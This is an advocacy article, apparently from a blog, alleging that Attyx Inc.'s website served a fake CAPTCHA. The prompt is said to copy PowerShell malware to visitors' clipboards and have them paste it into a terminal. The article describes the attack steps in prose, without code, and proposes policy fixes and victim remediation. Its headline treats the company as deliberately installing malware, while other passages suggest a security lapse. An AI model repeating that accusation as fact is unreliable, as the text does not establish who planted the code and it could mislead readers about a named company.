Attyx Inc. Is Forcing All Visitors To Its Website To Install Malware.

The Non-Financial Ledger

The people most likely to visit Attyx’s website right now are people who are already angry. They signed a contract with a solar company, something went wrong, and they are trying to figure out what the New York Attorney General is actually suing for. They came looking for answers. What they got was a computer they can no longer trust.

A fake CAPTCHA doesn’t feel like a cyberattack to the person it targets. It feels like a mistake they made themselves. The instructions on the page told them to paste something into their terminal. They followed directions. The code ran silently, in a hidden window, and cleaned up after itself. Many victims will never know it happened.

The people most vulnerable here aren’t security professionals. They are consumers who already feel wronged by this company, arriving at its website during a lawsuit that was supposed to protect them, and leaving with malware on their machines. I’m sure a boomer who isn’t as tech savvy as I would have fallen for this virus installation

Public Deception: The CAPTCHA That Was Never a CAPTCHA

The mechanism on Attyx’s site exploited one of the most trusted UI patterns on the internet, a verification checkbox, to deliver the opposite of what it appeared to offer.

• What visitors were shown: A standard-looking CAPTCHA verification prompt, the kind that appears on millions of legitimate websites to confirm a visitor is human. Clicking it carries a widely understood social contract: this is a safety step.
• What actually happened: The click silently copied PowerShell malware to the visitor’s clipboard. No confirmation, no warning, no visible sign that anything had occurred beyond the appearance of verification completing.
• What the page then said: Instructions directing the visitor to open their computer’s terminal and paste the clipboard contents, framed as a continuation of the verification process.
• What those instructions actually executed: A payload that connected to a remote command-and-control server, downloaded an encrypted archive, extracted and ran its contents in a hidden window, and deleted traces of the intrusion.

Anatomy of the Attack: How the Payload Works

What makes this attack effective is its simplicity. Every step exploits a behavior the victim has been trained to consider normal.

• Step one: The visitor lands on Attyx’s site, most likely because the AG lawsuit generated news coverage pointing them there.
• Step two: A fake CAPTCHA verification prompt is displayed. Clicking it doesn’t verify anything. It instead silently writes PowerShell malware to the visitor’s clipboard.
• Step three: The page provides instructions directing the visitor to open their terminal (Command Prompt or PowerShell on Windows) and paste what is in their clipboard, presenting this as the next step in verification.
• Step four: Execution connects to a command-and-control server under attacker control, downloads an encrypted archive, extracts it, and runs the contents inside a hidden window so nothing visible happens on screen.
• Step five: The intrusion deletes evidence of itself. The visitor’s machine is now compromised with no visible sign that anything occurred.

Societal Impact Mapping

Public Safety

The population most exposed to this attack is not a random cross-section of internet users. It is a specific group: people researching a company that the New York Attorney General has taken to court.

• The ongoing AG lawsuit generated public interest and news coverage, driving elevated traffic to Attyx’s site from people who had no prior relationship with the company and were seeking information about it.
• Visitors in this category are at heightened risk. They are unfamiliar with the company’s legitimate web properties and have no baseline for what a normal interaction on the site should look like, making them more susceptible to the social engineering component of the attack.
• The fake CAPTCHA technique does not require the visitor to download a file or approve an installation. It exploits a trained behavior (following on-screen instructions) that most computer users perform without scrutiny.
• The payload executes in a hidden window and removes its own traces, meaning the majority of affected visitors will have no indication their machine was compromised and will not seek remediation.

Economic Harm

Clipboard-hijacking malware delivered via command-and-control infrastructure is a category of attack associated with credential theft, financial account access, and ransomware staging.

• Individuals who executed the payload may have exposed banking credentials, saved passwords, and session tokens stored on the device.
• The encrypted archive delivery mechanism is consistent with a multi-stage attack architecture, where the initial payload functions as a loader for secondary tools deployed after initial access is established.
• Victims who do not discover the intrusion will not take protective steps such as changing credentials or notifying financial institutions, extending the window of exposure.

This Is the System Working as Intended

A company facing a consumer protection lawsuit remained in control of the website that consumers visited to research that lawsuit, with no mechanism requiring the site’s security posture to be audited or its infrastructure placed under any form of oversight during active litigation.

• The AG litigation concerns alleged misconduct toward consumers. The malicious CAPTCHA attacked the same consumer population the lawsuit was designed to protect, on the corporate website those consumers visited to understand their rights.
• There is no existing regulatory requirement that a company under consumer protection litigation submit its public-facing digital infrastructure to independent security review. The site remained fully operational and under the company’s control throughout.
• The attack’s self-deletion mechanism directly reduced the probability of forensic evidence being available to affected individuals, law enforcement, or the court overseeing the existing litigation.

What a Legitimate Fix Looks Like

This case exposes a specific gap: consumer protection enforcement has no mechanism to secure the digital infrastructure of companies under active litigation against the very consumers that litigation is meant to protect.

Regulatory Track

• State attorneys general pursuing consumer protection actions should be empowered to seek emergency injunctive relief requiring independent third-party security audits of respondent companies’ public-facing websites as a condition of continued operation during litigation.
• The FTC and state consumer protection agencies should issue guidance classifying deliberate malicious code deployment on a corporate website as an unfair or deceptive act or practice under existing consumer protection statutes, triggering mandatory breach notification obligations to affected site visitors.
• CISA should establish a fast-track reporting pathway for malicious CAPTCHA and clipboard-hijacking campaigns targeting consumers of companies under active regulatory enforcement, enabling coordinated takedown requests without requiring individual victim complaints.

Legislative Track

• Legislatures should amend existing consumer protection statutes to explicitly cover digital infrastructure deployed to deceive or harm the same consumers the statutes protect, closing the current gap that treats website-delivered malware as a cybercrime matter separate from consumer fraud.
• States with active AG enforcement programs should pass legislation authorizing courts to appoint independent digital monitors for companies under consumer protection litigation, with authority to examine and remediate public-facing web infrastructure.
• Congress should consider expanding the Computer Fraud and Abuse Act’s civil remedy provisions to explicitly allow class actions by victims of corporation-operated malicious CAPTCHA attacks, removing the current ambiguity around standing for clipboard-hijacking victims who cannot demonstrate specific financial loss.

Corporate Governance Track

• Companies under active consumer protection litigation should be required, as a condition of settlement or consent decree, to submit to continuous third-party web application security monitoring for the duration of any remediation period.
• Board-level governance standards should require that legal counsel overseeing consumer litigation be notified immediately of any anomalous code detected on public-facing properties, with a documented incident response obligation.
• Executive liability provisions in consent decrees should extend to cybersecurity failures that harm the same consumer class covered by the underlying enforcement action, creating a personal accountability mechanism that does not currently exist.

What Now?

If you visited the Attyx, Inc. website and followed any on-screen instructions involving your terminal, clipboard, or a verification prompt, treat your device as compromised. The entities with jurisdiction over what happened next are listed below.

• Regulatory Watchlist: New York Attorney General (active plaintiff in the existing litigation; has direct standing to investigate the malware deployment as an aggravating act); the FBI’s Internet Crime Complaint Center (IC3) for federal cybercrime reporting; CISA for infrastructure-level threat coordination.
• If you were affected: File a complaint with the NY AG’s office directly. The existing litigation creates a documented record that strengthens any individual report. Document the date and time you visited the site.
• Immediate steps: Change passwords for any accounts you were logged into on the affected device. Notify your bank. Run a reputable malware scanner. If the device is used for work, notify your IT or security team immediately.
• Mutual aid: Share this article with anyone who told you they were researching Attyx or the AG lawsuit. The self-deleting nature of this payload means most victims do not know they are victims.
• Community organizing: Local consumer protection groups and digital rights organizations can amplify pressure on both the AG’s office to address the malware as part of its existing action and on federal agencies to coordinate a response.